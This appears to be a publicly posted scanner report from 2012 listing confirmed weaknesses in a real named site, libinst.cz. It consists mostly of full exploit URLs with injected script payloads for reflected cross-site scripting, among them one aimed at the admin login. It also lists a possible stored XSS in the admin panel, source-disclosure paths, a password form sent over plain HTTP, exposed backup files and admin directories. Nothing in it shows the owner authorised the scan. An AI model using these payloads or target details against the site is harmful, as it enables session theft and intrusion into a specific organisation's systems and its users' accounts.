sroub3k

libinst.cz

May 8th, 2012
  1. http://libinst.cz - Liberální institut - XSS -
  2.  
  3. ||| XSS (Cross-site Scripting)
  4.  
  5. Severity: Important
  6. Confirmation: Confirmed
  7. Vulnerable URL: http://libinst.cz/komentare.php?centrum=5&typ=--><script>alert(9)</script>
  8. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  9. Parameter Name: typ
  10. Parameter Type: Querystring
  11. Attack Pattern: --><script>alert(9)</script>
  12.  
  13. Severity: Important
  14. Confirmation: Confirmed
  15. Vulnerable URL: http://libinst.cz/clanky.php?centrum=5&typ='><script>alert(9)</script>
  16. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  17. Parameter Name: typ
  18. Parameter Type: Querystring
  19. Attack Pattern: '><script>alert(9)</script>
  20.  
  21. Severity: Important
  22. Confirmation: Confirmed
  23. Vulnerable URL: http://libinst.cz/stranka.php?inc=email-send&adresa='"--></style></script><script>alert(0x0005C6)</script>&id=985
  24. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  25. Parameter Name: adresa
  26. Parameter Type: Querystring
  27. Attack Pattern: '"--></style></script><script>alert(0x0005C6)</script>
  28.  
  29. Severity: Important
  30. Confirmation: Confirmed
  31. Vulnerable URL: http://libinst.cz/stranka.php?inc=email-send&adresa=clanky.php&id='"--></style></script><script>alert(0x0005CB)</script>
  32. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  33. Parameter Name: id
  34. Parameter Type: Querystring
  35. Attack Pattern: '"--></style></script><script>alert(0x0005CB)</script>
  36.  
  37. Severity: Important
  38. Confirmation: Confirmed
  39. Vulnerable URL: http://libinst.cz/stranka.php?inc=multimedia
  40. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  41. Parameter Name: str
  42. Parameter Type: Post
  43. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  44.  
  45. Severity: Important
  46. Confirmation: Confirmed
  47. Vulnerable URL: http://libinst.cz/admin/administrace.php?lang=en
  48. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  49. Parameter Name: user
  50. Parameter Type: Post
  51. Attack Pattern: '"--></style></script><script>alert(0x0008A2)</script>
  52.  
  53. Severity: Important
  54. Confirmation: Confirmed
  55. Vulnerable URL: http://libinst.cz/stranka_en.php?inc=multimedia_en
  56. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  57. Parameter Name: str
  58. Parameter Type: Post
  59. Attack Pattern: "><iframe onload=alert(9)>
  60.  
  61.  
  62. ||| [Possible] Permanent Cross-site Scripting
  63.  
  64. Severity: Important
  65. Confirmation: Confirmed
  66. Vulnerable URL: http://libinst.cz/admin/administrace.php
  67. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  68. Injection URL: http://libinst.cz/admin/administrace.php?lang=en
  69.  
  70. ||| [Possible] PHP Source Code Disclosure
  71.  
  72. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  73. Severity: Medium
  74. Confirmation: Confirmed
  75.  
  76. Vulnerable URL: http://libinst.cz/osobni/schwarz/
  77. Vulnerable URL: http://libinst.cz/osobni/sima/
  78. Vulnerable URL: http://libinst.cz/osobni/stastny/
  79. Vulnerable URL: http://libinst.cz/osobni/barak/
  80. Vulnerable URL: http://libinst.cz/osobni/pavlik/
  81. Vulnerable URL: http://libinst.cz/osobni/stefunko/
  82.  
  83. ||| Password Transmitted Over HTTP
  84.  
  85. Severity: Important
  86. Confirmation: Confirmed
  87. Vulnerable URL: http://libinst.cz/admin/administrace.php?lang=en&id=alter_stranka
  88. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  89. Form target action: administrace.php?lang=en
  90.  
  91. ||| [Possible] Backup File Found
  92.  
  93. Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
  94. Severity: Low
  95. Confirmation: Confirmed
  96.  
  97. Vulnerable URL: http://libinst.cz/novinky.php~
  98. Vulnerable URL: http://libinst.cz/rss.php~
  99. Vulnerable URL: http://libinst.cz/komentare.php~
  100. Vulnerable URL: http://libinst.cz/clanky.php~
  101. Vulnerable URL: http://libinst.cz/stranka.php~
  102.  
  103. ||| Robots.txt Identified
  104.  
  105. Severity: Information
  106. Confirmation: Confirmed
  107. Vulnerable URL: http://libinst.cz/robots.txt
  108. Interesting Robots.txt Entries:
  109.  
  110. Disallow: /data
  111. Disallow: /etexts
  112. Disallow: /jirka
  113. Disallow: /pictures
  114. Disallow: /pic
  115. Disallow: /temp
  116. Disallow: /tl
  117. Disallow: /zeleznice
  118. Disallow: /cesta
  119. Disallow: /admin